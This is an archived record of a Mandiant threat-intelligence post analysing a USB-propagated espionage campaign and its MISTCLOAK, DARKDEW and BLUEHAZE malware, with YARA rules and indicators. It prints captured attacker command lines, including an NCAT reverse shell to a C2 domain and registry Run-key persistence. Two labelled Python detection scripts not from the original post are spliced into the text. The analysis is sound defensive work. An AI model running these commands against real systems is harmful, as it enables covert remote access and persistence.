{
	"id": "e77457b9-7317-4de2-bc99-497586096d5c",
	"created_at": "2026-04-06T00:12:51.051444Z",
	"updated_at": "2026-04-10T03:36:48.398639Z",
	"deleted_at": null,
	"sha1_hash": "8042d71d911648f3b2811e731f99c1f3f0901db9",
	"title": "Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1003451,
	"plain_text": "Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia | Mandiant\r\nBy Mandiant\r\nPublished: 2022-11-28 · Archived: 2026-04-05 18:16:11 UTC\r\nWritten by: Ryan Tomcik, John Wolfram, Tommy Dacanay, Geoff Ackerman\r\nMandiant Managed Defense recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we assess it has a China nexus.\r\nUNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ; however, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines.\r\nFollowing initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor. The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems.\r\nMandiant Managed Defense performs continuous threat hunting for customers, discovering evidence of new tactics, techniques, and procedures (TTPs) that can evade traditional detection mechanisms.\r\nIn response to this campaign, Mandiant deployed new real-time detections, enhancing Managed Defense’s protection for our customers from future similar activity. Our Adversary Operations team created and deployed YARA rules and Mandiant Security Validation Actions, shared at the end of the post. 
This blog post details our initial threat hunting discovery, the newly identified malware families, detection opportunities, and Mandiant’s assessment about the goals and motivations of the threat actor.\r\nMalware Observed\r\nMandiant observed UNC4191 deploy the following malware families.\r\nMISTCLOAK: a launcher written in C++ that executes an encrypted executable payload stored in a file on disk.\r\nBLUEHAZE: a launcher written in C/C++ that launches a copy of NCAT to create a reverse shell to a hardcoded command and control (C2).\r\nDARKDEW: a dropper written in C++ that is capable of infecting removable drives.\r\nNCAT: a command-line networking utility that was written for the Nmap Project to perform a wide variety of security and administration tasks. While NCAT may be used for legitimate purposes, threat actors may also use it to upload or download files, create backdoors or reverse shells, and tunnel traffic to evade network controls.\r\nTable 1: UNC4191 Malware Families\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 1 of 13\r\nInitial Detection\r\nMandiant Managed Defense customers receive Mandiant’s dedicated proactive Threat Hunting service. Mandiant's threat hunting team leverages the MITRE ATT\u0026CK® framework as a guide for developing Hunt Missions that examine endpoint telemetry data, such as process events, for collection and ATT\u0026CK technique ID tagging. The resulting threat hunting data set provides the team with wide visibility across the customer base. When performing analysis, we augment this data set with more targeted sources, like custom, real-time alerting from our customers’ endpoint detection and response (EDR) technologies.\r\nMandiant uses custom tooling to identify ATT\u0026CK technique sequences and clusters associated with common threat actor behaviors. 
A technique sequence is useful for identifying events with a defined order of execution, such as the creation of a local account (T1136.001) and then addition to the local Administrators group (T1098). A technique cluster identifies a grouping of techniques that don’t necessarily occur in a specific order. By focusing on technique sequences and clusters, we reduce the amount of data that needs to be manually reviewed by analysts.\r\nFor example, Mandiant has observed threat actors enumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002) within a several-minute span (Figure 1). The combined event count for these three techniques occurring on their own can number in the hundreds of thousands, but by applying technique sequencing or clustering we can reduce the number of interesting events to a manageable amount.\r\nFigure 1: Visualization of technique sequencing and clustering concepts\r\nMandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our “Mandiant Intelligence: Staging Directories” and “Command and Scripting Interpreter: Windows Command Shell (T1059.003)” hunting missions (Figure 2).\r\nFigure 2: Technique sequence that led to UNC4191 detection\r\nThe techniques performed by UNC4191 led to the development of additional technique sequences and detection opportunities, as described in the Detection Opportunities section.\r\nUNC4191 Malware Infection Cycle\r\nThe overall infection cycle from this campaign can be split into three distinct phases, shown in Figure 3.\r\nFigure 3: UNC4191 malware infection cycle\r\nPhase I: MISTCLOAK\r\nThe infection chain begins 
when a user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volume (T1091). The initial binaries, observed under names such as Removable Disk.exe, Removable Drive.exe, and USB Drive.exe, are versions of a legitimately signed application called USB Network Gate, developed by the company Electronic Team, Inc. These are used to side-load the MISTCLOAK malware, which impersonates a legitimate DLL (Table 2).\r\nMD5: f45726a9508376fdd335004fca65392a\r\nFile Name(s): D:\\Removable Disk.exe, D:\\USB Drive.exe\r\nSignature Subject: Electronic Team, Inc\r\nProduct Name: USB Network Gate\r\nOriginal File Name: UsbConfig.exe\r\nMD5: 707de51327f6cae5679dee8e4e2202ba\r\nFile Name(s): D:\\Removable Disk.exe, D:\\USB Drive.exe\r\nSignature Subject: Electronic Team, Inc\r\nProduct Name: USB Network Gate\r\nOriginal File Name: UsbConfig.exe\r\nTable 2: Legitimate USB Network Gate binaries used to side-load MISTCLOAK malware\r\nThe renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device (T1574.002) (Table 3). MISTCLOAK is a launcher for the encrypted file usb.ini, which MISTCLOAK reads from the current directory or the path autorun.inf\\Protection for Autorun\\System Volume Information\\usb.ini. Mandiant identified the PDB file path G:\\project\\APT\\U盘劫持\\new\\u2ec\\Release\\u2ec.pdb in the MISTCLOAK sample (Table 3); the DARKDEW sample carries the same G:\\project\\APT\\U盘劫持 project prefix (Table 4). 
Notably, the Chinese characters 盘劫持 translate to “disk hijacking”.\r\nMD5: 7753da1d7466f251b60673841a97ac5a\r\nFile Name: u2ec.dll\r\nCompile Time: 2021-09-01T09:23:30Z\r\nExports: u2ec.dll\r\nSize: 82,944\r\nPDB filename: G:\\project\\APT\\U盘劫持\\new\\u2ec\\Release\\u2ec.pdb (U盘劫持: “U Disk Hijacking”)\r\nTable 3: MISTCLOAK malware metadata\r\nMISTCLOAK then opens Windows Explorer to the location on the removable device where the user files are stored with the command ‘explorer.exe  \"\u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\"’.\r\nPhase II: DARKDEW\r\nThe file usb.ini contains an encrypted DLL payload called DARKDEW that is capable of infecting removable drives. If executed from a removable drive, DARKDEW will launch explorer.exe via `explorer.exe “\u003cdrive\u003e:\\autorun.inf\\Protection for Autorun”`, where \u003cdrive\u003e is a removable drive letter, such as “E”. DARKDEW will then check if either C:\\ProgramData\\udisk\\disk_watch.exe or C:\\ProgramData\\udisk\\DateCheck.exe exists and will create the directory C:\\ProgramData\\udisk if neither is found.\r\nMD5: 6900cf5937287a7ae87d90a4b4b4dec5\r\nFile Name: N/A\r\nCompile Time: 2021-09-09T08:45:31Z\r\nExports: N/A\r\nSize: 123,904\r\nPDB filename: G:\\project\\APT\\U盘劫持\\new\\shellcode\\Release\\shellcode.pdb\r\nTable 4: DARKDEW malware metadata\r\nDARKDEW then proceeds to copy every file from \u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\\System Volume Information\\ to C:\\ProgramData\\udisk\\. Mandiant identified files in this directory, such as Removable Drive (16GB).lnk, that originated from a system that was previously compromised by DARKDEW (T1074.001) and copied to a USB device. 
The copied data includes the files shown in Table 5 and arbitrary files with the extensions xlsx, docx, mp4, device, jpg, pptx, pdf, txt, and lnk.\r\nC:\\ProgramData\\udisk\\disk_watch.exe\r\nC:\\ProgramData\\udisk\\libeay32.dll\r\nC:\\ProgramData\\udisk\\Removable Disk.exe\r\nC:\\ProgramData\\udisk\\rzlog4cpp.dll\r\nC:\\ProgramData\\udisk\\rzlog4cpp_logger.dll\r\nC:\\ProgramData\\udisk\\ssleay32.dll\r\nC:\\ProgramData\\udisk\\u2ec.dll\r\nC:\\ProgramData\\udisk\\USB Drive.exe\r\nC:\\ProgramData\\udisk\\usb.ini\r\nC:\\ProgramData\\udisk\\UsbConfig.exe\r\nC:\\ProgramData\\udisk\\wuwebv.exe\r\nC:\\ProgramData\\udisk\\DateCheck.exe\r\nC:\\ProgramData\\udisk\\example.jpg\r\nC:\\ProgramData\\udisk\\example.xlsx\r\nTable 5: Files that are copied by DARKDEW from the removable drive to a compromised system\r\nDARKDEW will then copy the renamed USB Network Gate binary (e.g., Removable Drive.exe) to C:\\ProgramData\\udisk\\disk_watch.exe and create persistence with a registry key value named udisk under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (T1547.001). Finally, DARKDEW will launch a file named C:\\ProgramData\\udisk\\DateCheck.exe and then exit.\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue: udisk\r\nText: c:\\programdata\\udisk\\disk_watch.exe\r\nTable 6: DARKDEW registry persistence\r\nIf DARKDEW is executed from a non-removable drive, the behavior is slightly different. DARKDEW will create the directory C:\\ProgramData\\udisk\\, then copy every file in the current directory of the parent executable to C:\\ProgramData\\udisk\\. It will then copy the parent executable to C:\\ProgramData\\udisk\\disk_watch.exe and launch it. 
The persistence mechanism is identical, and it will also launch C:\\ProgramData\\udisk\\DateCheck.exe.\r\nWhen DARKDEW is executed within the context of disk_watch.exe, the malware will scan the system every 10 seconds for removable drives by enumerating volumes from A to Z until it finds one that is removable. The DARKDEW malware then creates the directory \u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\\, sets its attribute to hidden, and copies the contents of the current working directory of disk_watch.exe to that directory or the subdirectory \u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\\System Volume Information\\. This capability appears to be a method for self-replication and to transfer files that may be collected from air-gapped systems.\r\nPhase III: BLUEHAZE\r\nThe binary DateCheck.exe is a renamed version of a legitimate, signed application called Razer Chromium Render Process by Razer USA Ltd. (Table 7).\r\nMD5: ea7f5b7fdb1e637e4e73f6bf43dcf090\r\nFile Name(s): DateCheck.exe\r\nSignature Subject: Razer USA Ltd.\r\nProduct Name: Razer Chromium Render Process\r\nOriginal File Name: RzCefRenderProcess.exe\r\nTable 7: Legitimate Razer USA Ltd. binary used to side-load BLUEHAZE malware\r\nThe renamed Razer application, DateCheck.exe, loads the legitimate file rzlog4cpp_logger.dll, which calls the getRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startup (T1574.002).\r\nMD5: f632e4b9d663d69edaa8224a43b59033\r\nFile Name: RzLog4CPP.dll\r\nCompile Time: 2021-09-09T09:27:12Z\r\nExports: log4cpp.dll\r\nSize: 201,216\r\nPDB filename: N/A\r\nTable 8: BLUEHAZE malware metadata\r\nBLUEHAZE will create a new directory called C:\\Users\\Public\\Libraries\\CNNUDTV\\, then it will create the registry key value ACNTV under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (T1547.001) for persistence. 
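A host-side triage check for the on-disk and registry artifacts described in Phases I to III, as an added example that is not code from the original post or from Mandiant. It looks for the MISTCLOAK side-load pair and the DARKDEW autorun.inf\\Protection for Autorun layout on a volume root, for the staging marker files in C:\\ProgramData\\udisk and C:\\Users\\Public\\Libraries\\CNNUDTV, and for the udisk and ACNTV Run values. The function names, the marker-file selection, and the sample volume it builds in a temporary directory (empty placeholder files, no malware) are this example's assumptions; it does not check the hidden attribute DARKDEW sets, so it also runs on a non-Windows host against a mounted USB image.

```python
import os
import re
import tempfile

# Artifact names are taken from the DARKDEW and BLUEHAZE descriptions on this page.
LAUNCHER_NAMES = {'removable disk.exe', 'removable drive.exe', 'usb drive.exe'}
STAGING_MARKERS = {'disk_watch.exe', 'datecheck.exe', 'wuwebv.exe', 'usb.ini', 'u2ec.dll', 'rzlog4cpp.dll'}
USB_DIR = os.path.join('autorun.inf', 'Protection for Autorun')
USB_PAYLOAD = os.path.join(USB_DIR, 'System Volume Information', 'usb.ini')
STAGING_DIRS = ('C:\\ProgramData\\udisk', 'C:\\Users\\Public\\Libraries\\CNNUDTV')
RUN_VALUE_PATTERNS = {   # HKCU\\...\\Run value name -> data observed for that value on this page
    'udisk': re.compile('programdata\\\\udisk\\\\disk_watch\\.exe', re.I),
    'ACNTV': re.compile('rundll32.*ShellExec_RunDLL.*Libraries\\\\CNNUDTV\\\\DateCheck\\.exe', re.I),
}


def _names(path):
    '''Lower-cased directory listing; empty if the path is missing or unreadable.'''
    try:
        return {n.lower() for n in os.listdir(path)}
    except OSError:
        return set()


def scan_removable_root(root):
    '''Findings for one mounted volume root, e.g. D:\\ on a live host or a mounted USB image.'''
    findings, names = [], _names(root)
    launchers = sorted(names & LAUNCHER_NAMES)
    if launchers and 'u2ec.dll' in names:
        findings.append('MISTCLOAK side-load pair at volume root: %s + u2ec.dll' % ', '.join(launchers))
    if os.path.isdir(os.path.join(root, USB_DIR)):
        findings.append('DARKDEW directory present: ' + USB_DIR)
    if os.path.isfile(os.path.join(root, USB_PAYLOAD)):
        findings.append('DARKDEW encrypted payload present: ' + USB_PAYLOAD)
    return findings


def scan_staging_dir(path):
    '''Findings for a host staging directory such as C:\\ProgramData\\udisk.'''
    present = sorted(_names(path) & STAGING_MARKERS)
    return ['%s contains %s' % (path, ', '.join(present))] if present else []


def check_run_values(values):
    '''values maps Run value names to their data; returns the (name, data) pairs that match.'''
    return [(n, d) for n, d in values.items()
            if n in RUN_VALUE_PATTERNS and RUN_VALUE_PATTERNS[n].search(d)]


def read_hkcu_run():
    '''Read HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run on Windows; {} elsewhere.'''
    try:
        import winreg
    except ImportError:
        return {}
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run') as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:          # no more values
                return values
            values[name] = str(data)
            i += 1


def build_sample_volume(root):
    '''Write a constructed copy of the DARKDEW drive layout under root (empty files, no malware).'''
    os.makedirs(os.path.join(root, os.path.dirname(USB_PAYLOAD)), exist_ok=True)
    for rel in ('USB Drive.exe', 'u2ec.dll', USB_PAYLOAD):
        open(os.path.join(root, rel), 'wb').close()
    return root


def demo_findings():
    '''Build the constructed sample volume in a temporary directory and scan it.'''
    return scan_removable_root(build_sample_volume(tempfile.mkdtemp()))


if __name__ == '__main__':
    for line in demo_findings():
        print('sample volume:', line)
    for path in STAGING_DIRS:            # real staging paths on the host running the script
        for line in scan_staging_dir(path):
            print('host:', line)
    for name, data in check_run_values(read_hkcu_run()):
        print('run key:', name, '=', data)
```

On a live Windows host, point scan_removable_root at each removable volume root and let read_hkcu_run supply the Run values; on an analysis box, pass the mount point of an acquired USB image and a Run-key export converted to a dict. The Run-value check deliberately keys on the value name and its data together, since udisk or ACNTV alone would be a weak indicator.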
Next, BLUEHAZE copies all the files from its working directory to C:\\Users\\Public\\Libraries\\CNNUDTV\\ and then executes a renamed NCAT executable, wuwebv.exe, to create a reverse shell to the hard-coded command and control (C2) address closed[.]theworkpc[.]com:80 (T1059). Mandiant has not observed evidence of reverse shell interaction; however, based on the age of the activity, this may be a result of visibility gaps or short log retention periods.\r\nDateCheck.exe \u003e\r\n\u003e \"cmd.exe /C reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v ACNTV /t REG_SZ /d \\\"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \\\"C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\DateCheck.exe\\\"\\\" /f\"\r\n\u003e cmd.exe /c copy *.* C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\\r\n\u003e cmd.exe /C wuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe closed.theworkpc[.]com 80\r\nTable 9: BLUEHAZE command execution (child command lines of DateCheck.exe, shown as captured)\r\nOutlook and Implications\r\nBased on available data, such as PE compile timestamps for the malware involved in the aforementioned activity, this campaign potentially extends back to September 2021. Given the worming nature of the malware involved, we may have detected the later stages of this malware’s proliferation.\r\nWe believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China’s political and commercial interests. 
Our observations suggest that entities in the Philippines are the main target of this operation based on the number of affected systems located in this country that were identified by Mandiant.\r\nCampaign Tracking\r\nMandiant will continue to monitor UNC4191’s campaign and will provide notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or the use of new infrastructure to carry out their mission.\r\nFor more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature within Mandiant Advantage Threat Intelligence.\r\nDetection Opportunities\r\nEach Mandiant threat hunting discovery is evaluated for opportunities to create new real-time detections. These detections help Mandiant identify additional activity across our customers’ environments for rapid escalation and triage analysis and aim to reduce threat actor dwell time.\r\nFollowing our initial campaign discovery, we immediately searched the entire Managed Defense customer base for any activity that matched our atomic indicators of interest, including filenames, file paths, file hashes, IP addresses, domains, and other artifacts. 
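The technique-sequence and technique-cluster matching described in the Initial Detection section, run over the process tree that the detection-opportunity table in this section lays out, as an added example that is not part of the original post and not Mandiant tooling. The telemetry is constructed (host ws01, PIDs, timestamps, and a benign OneDrive Run-key write as noise), and the tagging rules are hypothetical reductions of the detection opportunities on this page. The ordered sequence is removable-media execution (T1091), then a Run-key write, then an NCAT reverse shell (T1059); the unordered cluster is a renamed side-load host (T1036, T1574.002) together with a rundll32 Run-key value (T1218.011). T1547.001 is used where the page cites the retired ID T1060.

```python
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    '''One process-creation record as an EDR would report it (constructed schema).'''
    ts: datetime
    host: str
    pid: int
    ppid: int
    image: str                 # full path of the new process
    cmdline: str
    original_name: str = ''    # OriginalFileName from the PE version resource, if captured
    techniques: set = field(default_factory=set)


# Hypothetical tagging rules distilled from the detection-opportunity table on this page.
NON_C_ROOT = re.compile('^[A-BD-Z]:\\\\', re.I)                       # image on a volume other than C:
EXPLORER_FOLDER = re.compile('explorer\\.exe\\s+\"[A-Z]:\\\\', re.I)    # explorer.exe handed a folder path
RUN_KEY_ADD = re.compile('reg\\s+add\\s+.*CurrentVersion\\\\Run\\b', re.I)
NCAT_REVSHELL = re.compile('(^|\\s)-e\\s+\\S*cmd\\.exe', re.I)          # ncat/netcat -e shell host port
SEQUENCE = ('T1091', 'T1547.001', 'T1059')                 # removable media, Run key, reverse shell
CLUSTER = frozenset({'T1036', 'T1574.002', 'T1218.011'})   # renamed side-load host + rundll32 Run key
WINDOW = timedelta(minutes=10)


def tag_events(events):
    '''Attach ATT&CK technique IDs to each event; parent lookup is by (host, ppid).'''
    by_pid = {(e.host, e.pid): e for e in events}
    for ev in events:
        parent = by_pid.get((ev.host, ev.ppid))
        name = ntpath.basename(ev.image).lower()
        if NON_C_ROOT.match(ev.image):
            ev.techniques |= {'T1091', 'T1036'}
        if name == 'explorer.exe' and EXPLORER_FOLDER.search(ev.cmdline) and parent and NON_C_ROOT.match(parent.image):
            ev.techniques.add('T1091')
        if ev.original_name and name != ev.original_name.lower():
            ev.techniques |= {'T1036', 'T1574.002'}   # renamed signed host used for DLL side-loading
        if RUN_KEY_ADD.search(ev.cmdline):
            ev.techniques.add('T1547.001')            # the page cites the retired ID T1060 for this
            if 'rundll32' in ev.cmdline.lower():
                ev.techniques.add('T1218.011')
        if NCAT_REVSHELL.search(ev.cmdline):
            ev.techniques.add('T1059')
    return events


def _by_host(events):
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_host[ev.host].append(ev)
    return by_host


def find_sequences(events, sequence=SEQUENCE, window=WINDOW):
    '''Ordered chain of techniques on one host inside window; one chain per terminal event.'''
    hits, reported = [], set()
    for host, evs in _by_host(events).items():
        for i, first in enumerate(evs):
            if sequence[0] not in first.techniques:
                continue
            chain = [first]
            for tech in sequence[1:]:
                nxt = next((e for e in evs[i + 1:] if tech in e.techniques
                            and e.ts > chain[-1].ts and e.ts - first.ts <= window), None)
                if nxt is None:
                    break
                chain.append(nxt)
            else:
                if (host, chain[-1].pid) not in reported:
                    reported.add((host, chain[-1].pid))
                    hits.append((host, chain))
    return hits


def find_clusters(events, techniques=CLUSTER, window=WINDOW):
    '''Unordered: every technique in the set seen on one host within window of an anchor event.'''
    hits = []
    for host, evs in _by_host(events).items():
        i = 0
        while i < len(evs):
            anchor, seen, group, j = evs[i], set(), [], i
            while anchor.techniques & techniques and j < len(evs) and evs[j].ts - anchor.ts <= window:
                new = (evs[j].techniques & techniques) - seen
                if new:                      # keep only events that contribute a new technique
                    seen |= new
                    group.append(evs[j])
                if seen >= techniques:
                    hits.append((host, group))
                    i = j                    # cluster members are not reused as anchors
                    break
                j += 1
            i += 1
    return hits


def sample_events():
    '''Constructed telemetry modelled on the process tree in the detection table (not real data).'''
    t0 = datetime(2022, 6, 1, 10, 0, 0)
    cmd = 'C:\\Windows\\System32\\cmd.exe'
    return [
        # benign Run-key write half an hour earlier: tagged T1547.001 but chains with nothing
        ProcEvent(t0 - timedelta(minutes=30), 'ws01', 500, 400, cmd, 'cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDrive /t REG_SZ /d C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /f'),
        ProcEvent(t0, 'ws01', 1000, 800, 'D:\\USB Drive.exe', '\"D:\\USB Drive.exe\"', 'UsbConfig.exe'),
        ProcEvent(t0 + timedelta(seconds=1), 'ws01', 1010, 1000, 'C:\\Windows\\explorer.exe', 'explorer.exe  \"D:\\autorun.inf\\Protection for Autorun\"', 'EXPLORER.EXE'),
        ProcEvent(t0 + timedelta(seconds=2), 'ws01', 1020, 1000, 'C:\\ProgramData\\udisk\\disk_watch.exe', 'c:\\programdata\\udisk\\disk_watch.exe', 'UsbConfig.exe'),
        ProcEvent(t0 + timedelta(seconds=3), 'ws01', 1030, 1000, 'C:\\ProgramData\\udisk\\DateCheck.exe', 'c:\\programdata\\udisk\\DateCheck.exe', 'RzCefRenderProcess.exe'),
        ProcEvent(t0 + timedelta(seconds=4), 'ws01', 1040, 1030, cmd, 'cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\Users\\Public\\Libraries\\CNNUDTV\\DateCheck.exe\"\" /f'),
        ProcEvent(t0 + timedelta(seconds=5), 'ws01', 1050, 1030, cmd, 'cmd.exe /c copy *.* C:\\Users\\Public\\Libraries\\CNNUDTV\\'),
        ProcEvent(t0 + timedelta(seconds=6), 'ws01', 1060, 1030, cmd, 'cmd.exe /C wuwebv.exe -t -e c:\\windows\\system32\\cmd.exe closed.theworkpc[.]com 80'),
    ]


if __name__ == '__main__':
    evs = tag_events(sample_events())
    for host, chain in find_sequences(evs):
        print(host, 'sequence:', ' -> '.join('%d %s' % (e.pid, ntpath.basename(e.image)) for e in chain))
    for host, group in find_clusters(evs):
        print(host, 'cluster:', sorted(e.pid for e in group))
```

Run as a script it prints one sequence (USB Drive.exe, then the ACNTV reg add, then the wuwebv.exe reverse shell) and one cluster; in practice the events would come from an EDR export rather than sample_events(). The window is what keeps the earlier OneDrive Run-key write from chaining with the removable-drive launch, and reporting one chain per terminal event stops the explorer.exe child (also tagged T1091) from duplicating the same finding.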
This uncovered activity on systems at multiple customers.\r\nAdditionally, we also created or updated real-time Managed Defense detections to identify threat actor methodologies, such as:\r\n- Deployment or usage of NETCAT and NCAT reverse shells\r\n- Modification of registry Run keys for malware persistence, with arguments configured to execute the Windows binary rundll32.exe\r\n- Processes launched from the C:\\Users\\Public\\Libraries\\ directory\r\nBy combining Mandiant’s threat intelligence service with Managed Defense’s detection engineering and threat hunting capabilities, we can rapidly identify and provide context around malicious activity.\r\nDetection Opportunity: NCAT reverse shell execution arguments\r\nMITRE ATT\u0026CK: T1059\r\nEvent Details: wuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe closed.theworkpc[.]com 80\r\nDetection Opportunity: Parent or grandparent processes executing from non-C:\\ drive root\r\nMITRE ATT\u0026CK: T1091, T1036\r\nEvent Details:\r\nProcess: D:\\USB Drive.exe\r\nChild Processes:\r\n\u003e explorer.exe  \"D:\\autorun.inf\\Protection for Autorun\"\r\n\u003e c:\\programdata\\udisk\\disk_watch.exe\r\n\u003e c:\\programdata\\udisk\\DateCheck.exe\r\nGrandchild Processes:\r\n\u003e\u003e \"cmd.exe /C reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v ACNTV /t REG_SZ /d \\\"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \\\"C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\DateCheck.exe\\\"\\\" /f\"\r\n\u003e\u003e cmd.exe /c copy *.* C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\\r\n\u003e\u003e cmd.exe /C wuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe closed.theworkpc[.]com 80\r\nDetection Opportunity: Registry Run key persistence for binary in PROGRAMDATA\r\nMITRE ATT\u0026CK: T1060\r\nEvent Details:\r\nRegistry Key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue: udisk
Text: c:\\programdata\\udisk\\disk_watch.exe\r\nDetection Opportunity: Registry Run key executing RunDLL32 command\r\nMITRE ATT\u0026CK: T1218.011, T1060\r\nEvent Details: reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v ACNTV /t REG_SZ /d \\\"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \\\"C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\DateCheck.exe\\\"\\\" /f\r\nDetection Opportunity: File name of executing process does not match original name\r\nMITRE ATT\u0026CK: T1036, T1574.002\r\nEvent Details:\r\nOriginalFileName: UsbConfig.exe; File Name: Removable Disk.exe, USB Drive.exe\r\nOriginalFileName: RzCefRenderProcess.exe; File Name: DateCheck.exe\r\nDetection Opportunity: Windows Explorer process execution with folder path specified on command line\r\nMITRE ATT\u0026CK: T1091\r\nEvent Details:\r\nParent Process Path: D:\\USB Drive.exe\r\nProcess: explorer.exe\r\nCommand Line: explorer.exe  \"D:\\autorun.inf\\Protection for Autorun\"\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nA105-454: Protected Theater - UNC4191, BLUEHAZE, Execution, Variant #1\r\nA105-455: Protected Theater - UNC4191, DARKDEW, Execution, Variant #1\r\nA105-466: Command and Control - UNC4191, DNS Query, Variant #1\r\nYARA Rules\r\nMISTCLOAK\r\nrule M_Hunting_Launcher_MISTCLOAK_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $s1 = \"CheckUsbService\" ascii\r\n        $s2 = \"new\\\\u2ec\\\\Release\\\\u2ec.pdb\" ascii\r\n        $s3 = \"autorun.inf\\\\Protection for Autorun\" ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and\r\n        filesize \u003c 200KB and\r\n        (2 of ($s*))\r\n}\r\nDARKDEW\r\nrule M_Hunting_Dropper_DARKDEW_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $s1 = \"do inroot\" ascii\r\n        $s2 = \"disk_watch\" ascii\r\n        $s5 = 
\"G:\\\\project\\\\APT\\\\\" ascii\r\n        $s3 = \"c:\\\\programdata\\\\udisk\" ascii\r\n        $s4 = \"new\\\\shellcode\\\\Release\\\\shellcode.pdb\" ascii\r\n    condition:\r\n        filesize \u003c 500KB and\r\n        (2 of ($s*))\r\n}\r\nBLUEHAZE\r\nrule M_Hunting_Launcher_BLUEHAZE_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $s1 = \"Libraries\\\\CNNUDTV\" ascii\r\n        $s2 = \"closed.theworkpc.com\" ascii\r\n        $s3 = \"cmd.exe /C wuwebv.exe -t -e\" ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and\r\n        filesize \u003c 500KB and\r\n        (2 of ($s*))\r\n}\r\nIndicators of Compromise\r\nDomain: closed.theworkpc[.]com (NCAT C2)\r\nMD5: 7753da1d7466f251b60673841a97ac5a (MISTCLOAK)\r\nMD5: c10abb9f88f485d38e25bc5a0e757d1e (DARKDEW, usb.ini file)\r\nMD5: 6900cf5937287a7ae87d90a4b4b4dec5 (DARKDEW, decrypted payload)\r\nMD5: f632e4b9d663d69edaa8224a43b59033 (BLUEHAZE)\r\nMD5: 8ec339a89ec786b2aea556bedee679c7 (NCAT)\r\nMD5: f45726a9508376fdd335004fca65392a (USB Network Gate, legitimate binary used for DLL side-loading)\r\nMD5: 707de51327f6cae5679dee8e4e2202ba (USB Network Gate, legitimate binary used for DLL side-loading)\r\nMD5: ea7f5b7fdb1e637e4e73f6bf43dcf090 (Razer Chromium Render Process, legitimate binary used for DLL side-loading)\r\nFile Path: C:\\ProgramData\\udisk (file and malware staging)\r\nFile Path: C:\\Users\\Public\\Libraries\\CNNUDTV (file and malware staging)\r\nAcknowledgements\r\nSpecial thanks to Tobias Krueger and Conor Quigley for their assistance with analyzing the MISTCLOAK, DARKDEW, and BLUEHAZE samples and Matthew Hoerger for creating Mandiant Security Validation (MSV) actions. 
We would also like to thank Tim Martin, Alexander Pennino, Nick Richard, and Sarah Hawley for their technical review and feedback.\r\nPosted in: Threat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
